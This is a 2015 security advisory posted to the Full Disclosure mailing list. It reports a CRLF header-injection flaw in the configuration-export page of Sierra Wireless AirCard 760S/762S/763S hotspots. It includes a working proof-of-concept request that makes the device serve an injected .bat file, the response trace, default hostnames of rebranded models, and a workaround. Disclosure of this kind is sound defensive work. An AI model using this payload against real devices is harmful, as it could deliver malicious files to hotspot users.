Full Disclosure mailing list archives
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
From: Luke Walker <luke () blackduck nu>
Date: Wed, 14 Jan 2015 11:38:56 +1100
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection [*] Overview Sierra Wireless produces a mobile wi-fi hotspot device that is popular amongst telecommunication companies for re-branding to suit local markets. The AirCard 760S/762S/763S Web-based Administrative Console suffers from a HTTP header injection that allows an attacker to inject a file into the HTTP response from the device. [*] Description The configuration export function allows the name of the exported configuration file to be customised, but the parameter "save" is not filtered. http://<routerURL>/export.cfg?save=export.cfg [*] Traffic sample from POC (curl -L) (sample below tested on firmware SWI9200H2_03.05.11.00AP)
GET /export.cfg?save= export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a &sessionId=00000001%2DhYL4H 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1User-Agent: curl/7.40.0 Host: router.4g Accept: */*< HTTP/1.1 200 OK < Server: httpd/2.7 (sierra; D4C) < Date: Mon, 12 Jan 2015 05:32:38 GMT < Connection: keep-alive < Cache-Control: no-cache < Content-Disposition: attachment; filename=export.bat < Content-type: application/bat pause
Content-type: application/octet-stream Transfer-encoding: chunked 3a # # Configuration export from Telstra WI-FI 4G # # Model:
[*] Limitations While it does not require authentication, it does require user interaction and knowledge of the hotspot's hostname. However, the default hotspot names are well-known, based on the OEM'd version of the AirCard Mobile Hotspot: * 763S - Sierra Wireless Original OEM - http://aircard.hotspot * 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot * 762S - DNA 4G WLAN Mokkula - http://dna.mokkula * 760S - Telstra Mobile WiFi 4G - http://telstra.4g * 760S - BigPond Mobile - http://bigpond.4g [*] Workaround Change the name and IP address of the device to something other than the default settings. [*] Vendor Contact An attempt to contact both Sierra Wireless and NETGEAR (who seem to own support of the device now) was unsuccessful. regards , Luke _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection Luke Walker (Jan 13)